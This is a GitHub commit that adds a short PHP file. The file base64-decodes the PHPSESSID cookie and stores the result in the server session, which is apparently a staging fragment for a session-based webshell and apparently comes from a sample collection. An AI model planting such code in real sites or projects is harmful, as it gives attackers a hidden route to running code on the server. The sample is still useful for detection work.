tennc 2022-09-09 23:10:43 +08:00 committed by GitHub
parent f06a40760e
commit 4837a655b7
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

5
php/2022-09-09-02.php Normal file
View file

@ -0,0 +1,5 @@
<?php
session_start();
$_SESSION['dmeo']=base64_decode($_COOKIE["PHPSESSID"]);
?>